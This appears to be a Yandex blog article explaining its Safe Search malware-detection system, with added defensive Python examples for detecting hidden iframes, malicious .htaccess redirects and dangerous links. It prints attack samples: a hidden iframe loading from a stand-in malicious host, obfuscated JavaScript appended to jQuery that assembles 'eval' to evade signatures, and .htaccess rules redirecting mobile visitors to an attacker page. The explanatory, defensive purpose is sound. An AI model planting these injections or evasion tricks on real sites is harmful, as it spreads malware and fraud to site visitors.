How the Yandex Safe Search system works

In 2007, Yandex ran into a virus that replaced Yandex search results on users' computers on a massive scale: instead of relevant results, users saw advertisements unrelated to their query. A solution was needed urgently. While studying the problem, we found that the virus reached users' computers through drive-by-download attacks: an infected page silently initiates the download of malicious files, which then exploit vulnerabilities in the user's system to install malware on the computer.

Anti-virus programs do not always protect users from this kind of attack, or from new, merely repackaged malware, so users need additional protection. We realized that to overcome this phenomenon we had to detect infected sites, help webmasters remove the malicious code, and discourage them from participating in the affiliate networks through which the blocks that carry out drive-by-download attacks are distributed.

At a certain point it became clear that the problem was of an ecosystem nature: unless the viral and fraudulent monetization of sites was dealt with, its scale would grow rapidly, ultimately undermining users' trust in the Internet, hindering its growth, and even jeopardizing its existence in the form we are used to. So six years ago we began designing and developing a system for detecting dangerous sites, and four years ago it was launched. We continue to develop the system actively, adapting it to new threats and applying methods that detect malicious code which has not yet reached signature anti-virus databases.

How the Yandex anti-virus scan works



It all starts with our anti-virus robot visiting the page under check and downloading everything that would reach the browser of an ordinary user viewing it. The downloaded data is then analyzed.

The behavioral analyzer monitors everything that happens while the page is viewed, including the behavior of the browser, of plug-ins (in particular those for executing Java code and viewing PDF files) and of the operating system as a whole. The observations are compared with known patterns of malicious behavior. The main advantage of the behavioral approach is that it detects malicious code whose signatures have not yet reached anti-virus databases, which is exactly the kind of code cybercriminals often use to infect large sites.

In addition, we watch whether loading the page causes requests to servers known to distribute malicious code. This is how our blacklist works.

As an additional layer of protection, we run a signature scan of the search index with the Sophos antivirus scanner. We have built a mutually beneficial cooperation with this company: they understand the value of the data we provide, respond quickly to our requests and train their system on them.

The patterns of malicious behavior are defined by our biological analyzers, the virus analysts. They study current samples of malicious code and identify common features and patterns in how it operates. The results are used to improve the behavioral detectors and to extend the blacklist, and are also sent to Sophos as samples of malicious code.

In total, the system performs more than 20 million checks per day, detecting about 5,000 new infections and confirming that more than 80 thousand sites remain infected. The more popular a site and the higher its risk of infection, the more often our system checks it.

What are we protecting against?


Drive-by-download attacks still lead in the number of attacks on Internet users. To carry them out, cybercriminals embed malicious code in legitimate web applications, so that, alongside the site's own content, the browser loads specially crafted web pages that exploit vulnerabilities in browsers and other software to covertly install malicious programs on users' computers.

Such code may look, for example, as follows:

 <iframe src="http://evilsite.ws/wp-content/plugins/wordpress-importer/cash.php" width="13" height="14" frameborder="0" style="visibility: hidden; display: none"></iframe>


Usually the page loaded by such an iframe contains obfuscated code. This is how attackers try to evade signature detection.
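The iframe above has the three features that give away an injection: it points at a foreign host, it is hidden with CSS, and it is sized down to a few pixels. A static check for exactly that pattern, as an added example (not Yandex's code): the HTML below is constructed sample input, and the 20 px threshold is an assumption rather than a Yandex value.

```python
# Added example (not Yandex's code): flag iframes that are concealed
# (display:none / visibility:hidden) or sized down to a few pixels, and note
# when such a frame points at a host other than the page's own.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
TINY_PX = 20  # assumed: frames narrower or shorter than this are invisible in practice


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.frames.append({k.lower(): (v or "") for k, v in attrs})


def _px(value):
    """Parse '13' or '13px' into 13; percentages and anything else give None."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value or "")
    return int(m.group(1)) if m else None


def suspicious_iframes(html, page_host):
    """Return [(src, [reasons])] for iframes that are hidden or tiny.

    A visible iframe is never reported on its own, even if it is external:
    embedded videos and widgets are legitimate; concealment is the signal.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for frame in collector.frames:
        reasons = []
        src = frame.get("src", "")
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            reasons.append("external host %s" % host.lower())
        if HIDE_RE.search(frame.get("style", "")):
            reasons.append("hidden via CSS")
        width, height = _px(frame.get("width")), _px(frame.get("height"))
        if width is not None and height is not None and (width < TINY_PX or height < TINY_PX):
            reasons.append("tiny frame %dx%d" % (width, height))
        if any(r.startswith(("hidden", "tiny")) for r in reasons):
            findings.append((src, reasons))
    return findings


# Constructed sample: one legitimate embed, the injected frame from the article,
# and a 1x1 frame served from the page's own host.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/xyz123" width="560" height="315"></iframe>
<iframe src="http://evilsite.ws/wp-content/plugins/wordpress-importer/cash.php" width="13" height="14" frameborder="0" style="visibility: hidden; display: none"></iframe>
<iframe src="/ads/frame.html" width="1" height="1"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_PAGE, "www.example.com"):
        print(src, "->", "; ".join(reasons))
```

The same-host 1x1 frame is still reported, because a compromised site often serves the loader from its own document root; the external-host reason is recorded separately so an analyst can rank the two findings.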

Obfuscation is also used when malicious code is appended to the end of a legitimate library such as jQuery. To protect against attacks of this kind, you can avoid storing JS libraries on your own server and load them from a trusted source instead. Yandex runs its own hosting of popular JavaScript libraries, which anyone can use. Keep in mind that this moves the trust to the hosting provider; adding a Subresource Integrity hash to the script tag lets the browser reject a modified copy of the library wherever it is served from.

/*! jQuery v1.8.2 jquery.com | jquery.org/license */
(function(a,b){function G(a){var b=F[a]={};return p.each(a.split(s),function(a,c){b[c]=!0}),b}
/* jQuery code cut */
&&define("jquery",[],function(){return})})(window); //end of jquery code
// The appended malicious code starts here. It assembles the string "eval" in pieces
// and looks it up on the window object, so the word "eval" never appears in the
// file and a simple signature does not trigger.
var domain = 'http://somedomain.ru';
v = "v" + "al";
if (020 === 0x10 && window.document) { // 020 is octal 16: a check that a real JS engine, not a naive emulator, is running
try {
document.body++ // assigning a number to document.body fails in a browser, so the payload lives in the catch block
} catch(gdsgsdg) {
asd = 0;
try {
d = document.createElement("div");
d.innerHTML.a = "asd"; // silently ignored by a browser's DOM; an analysis stub without a real DOM may throw here
}catch (agdsg) {
asd = 1;
}
if (!asd) {
w = {a:window},a;
v = "e".concat(v); // v is now "eval" (printed as "contact" in the original, which would throw)
}
}
}
e = w["" + v]; // e is window.eval, obtained without ever writing the word


With the spread of mobile devices, attacks on them are becoming more popular. The most common scenario is this: a site owner joins an affiliate program to monetize mobile traffic and, often without realizing it, places a mobile redirect on the page. Viewed in an ordinary desktop browser, the site behaves completely normally, but a visitor coming from a mobile device is redirected to another page that asks them to install some application, for example an "updated" version of the browser. Depending on the User-Agent, such sites offer files with different extensions matching the visitor's platform. The user is then prompted to send a paid SMS, or the installed application sends such messages itself without the user's knowledge. If the application has obtained access to the contact list, it can also be used to send spam.

To carry out such an attack it is enough to modify the web server's .htaccess file, adding the redirect conditions to it:

RewriteEngine On
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
RewriteRule    (.*)    http://<redirect_target_site> [L,R=302]
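Because the rules live in a file the webmaster controls, the cheapest check is to scan the .htaccess itself rather than to probe the site with a mobile User-Agent. The following added example (not Yandex's code) looks for the pattern above: a RewriteCond on %{HTTP_USER_AGENT} that feeds a RewriteRule with the R flag and a target on another host. The .htaccess text and the host mobile-offer.example are constructed; the list of mobile keywords is an assumption.

```python
# Added example (not Yandex's code): scan an .htaccess for an injected
# User-Agent based redirect to an external host.
import re
from urllib.parse import urlparse

# Substrings that mark a UA pattern as targeting mobile platforms (assumed list).
MOBILE_HINTS = ("android", "iphone", "midp", "j2me", "symbian", "series 60",
                "blackberry", "windows phone", "windows ce", "bada", "mtk", "smartphone")

# Split on whitespace that is not backslash-escaped, so "series\ 60" stays one token.
_SPLIT_RE = re.compile(r"(?<!\\)\s+")
_REDIRECT_FLAG_RE = re.compile(r"\bR(=\d{3})?\b")  # [R], [R=302], [L,R=301] ...


def find_ua_redirects(htaccess_text, own_host):
    """Return one finding per User-Agent condition that feeds an external redirect."""
    findings = []
    pending = []  # RewriteCond lines waiting for the RewriteRule they apply to
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = _SPLIT_RE.split(line)
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append((lineno, parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            flags = parts[3] if len(parts) > 3 else ""
            host = urlparse(target).hostname
            external = host is not None and host.lower() != own_host.lower()
            if external and _REDIRECT_FLAG_RE.search(flags):
                for cond_line, variable, pattern in pending:
                    if variable.upper() == "%{HTTP_USER_AGENT}":
                        plain = pattern.lower().replace("\\ ", " ")
                        findings.append({
                            "cond_line": cond_line,
                            "rule_line": lineno,
                            "pattern": pattern,
                            "target": target,
                            "mobile_ua": any(h in plain for h in MOBILE_HINTS),
                        })
            pending = []  # a RewriteRule consumes the conditions before it
    return findings


def ua_matches(pattern, user_agent, nocase=True):
    """Test a User-Agent against a RewriteCond pattern ([NC] means case-insensitive)."""
    return re.search(pattern, user_agent, re.I if nocase else 0) is not None


# Constructed sample: a normal WordPress block with a redirect appended at the end.
SAMPLE_HTACCESS = """# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\\ 60|windows\\ phone) [NC]
RewriteRule (.*) http://mobile-offer.example/land.php [L,R=302]
"""

if __name__ == "__main__":
    for f in find_ua_redirects(SAMPLE_HTACCESS, "www.example.com"):
        print("lines %d/%d: UA pattern %s -> %s (mobile=%s)"
              % (f["cond_line"], f["rule_line"], f["pattern"], f["target"], f["mobile_ua"]))
```

A redirect to the site's own mobile version (same host) is deliberately not reported; what the scan singles out is traffic leaving the site based on the visitor's device, which is what the affiliate scheme above needs.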


Our detection tools track such sites: they are excluded from mobile search results, and our browser for Android and iOS shows a warning before opening a site with a redirect.

Besides the drive-by-download attacks already mentioned and redirects to pages that push malware downloads, a site may carry a redirect to a phishing page that exactly copies the interface of a legitimate service. Such pages usually ask the user to enter personal information, which is then used for fraud and for sending spam.

Phishing also covers cases where a banner on the site offers to download a new version of the browser. When the user tries to download the installer, the site asks for a phone number to which a confirmation code will supposedly be sent, "to prove you are not a robot". In reality the user is subscribed to a paid service. Such banners are often the result of the site being hacked or of participation in unscrupulous affiliate programs.

Warnings about dangerous sites

Information about the malicious sites we find is stored in a database. At present we know of more than 200 thousand infected and phishing sites worldwide, about 20% of which have domains in zones belonging to Russia and the CIS countries.

When a site is found to be infected, we email its webmaster at the standard addresses and at the contacts listed in the domain registration data. This cuts the average time a site stays infected by roughly 1.6 times.

The same data is then used to warn users on the search results page, in Yandex.Mail, in Yandex.Browser, and in Opera and Mozilla Firefox with Yandex.Elements installed. On average we show about 5 million warnings a day on the search results page and in services, and about 3 million in browsers; during mass infections of sites the number can reach 18 million warnings per day.

Users can also protect themselves with the Yandex.DNS service. Our DNS server at 77.88.8.88 filters dangerous sites and shows a warning when a user tries to open one.

Clicks on external links in Yandex.Mail go through a special warning redirector. It compares the link against URL masks of infected sites and, on a match, redirects to a warning page, after which the user can decide whether to proceed.

I would especially like to note that the links themselves from Yandex.Mail messages are not sent anywhere and are not checked by the Safe Search system; they are only compared against the URL masks of dangerous sites already known to Yandex. Users' links in Mail remain confidential and are never used for indexing or for displaying contextual advertising.
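The two paragraphs above describe a purely local comparison: the link is matched against masks the service already holds and is never transmitted. The following added example (not Yandex's implementation) shows the shape of such a redirector: masks are a host plus an optional path prefix, subdomains of a masked host are covered, and the host is lower-cased and the path percent-decoded before matching so that trivial obfuscation does not slip past. The masks, hosts and warning-page URL are constructed.

```python
# Added example (not Yandex's implementation): a warning redirector that
# matches outbound links against URL masks locally and never sends them anywhere.
from urllib.parse import quote, unquote, urlsplit

WARNING_PAGE = "https://safe.example/warning"  # hypothetical warning page

# (host, path_prefix): an empty prefix covers the whole host; every mask also
# covers subdomains of its host. Constructed sample data.
DANGEROUS_MASKS = [
    ("evilsite.ws", ""),
    ("hacked-shop.example", "/wp-content/uploads/"),
]


def normalize(url):
    """Lower-case the host, drop a trailing dot, percent-decode the path."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower().rstrip(".")
    path = unquote(parts.path) or "/"
    return parts.scheme.lower(), host, path


def matches_mask(host, path, mask_host, mask_path):
    """True when host is the mask host or one of its subdomains and path is under the prefix."""
    host_ok = host == mask_host or host.endswith("." + mask_host)
    return host_ok and path.startswith(mask_path)


def route_link(url):
    """Return the URL the browser should be sent to: the link itself or the warning page."""
    scheme, host, path = normalize(url)
    if scheme not in ("http", "https"):
        return url  # masks describe web sites; other schemes are out of scope here
    for mask_host, mask_path in DANGEROUS_MASKS:
        if matches_mask(host, path, mask_host, mask_path):
            # the original link travels only as a parameter of our own warning page
            return "%s?url=%s" % (WARNING_PAGE, quote(url, safe=""))
    return url


if __name__ == "__main__":
    for link in ("http://www.python.org/",
                 "http://EvilSite.ws/wp-content/plugins/wordpress-importer/cash.php",
                 "http://hacked-shop.example/wp-content/%75ploads/x.php"):
        print(link, "->", route_link(link))
```

Path prefixes matter for legitimate sites with a single infected directory: warning on the whole host would block the site's clean pages, while warning on the uploads directory alone still covers the injected files.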

For infected sites registered in Yandex.Webmaster we show detailed information about the infection. If the webmaster cannot remove the infection and eliminate its cause himself, he can turn to our technical support for help.

To check a URL for malware you can connect to the Yandex Safe Browsing API, or use virustotal.com, which uses Yandex Safe Search as one of its URL scanners.

We will be glad to receive samples of malware that runs on the web server side (server backdoors, malicious Apache modules, infected CMS templates and the like) at virus-samples@yandex-team.ru.

For cooperation, please contact safesearch@yandex-team.ru.
The Yandex Antivirus Technology & Safe Search booth will be at YaC, where you can talk with our virus analysts, take part in the malware detection contest, and learn more about the Safe Browsing API.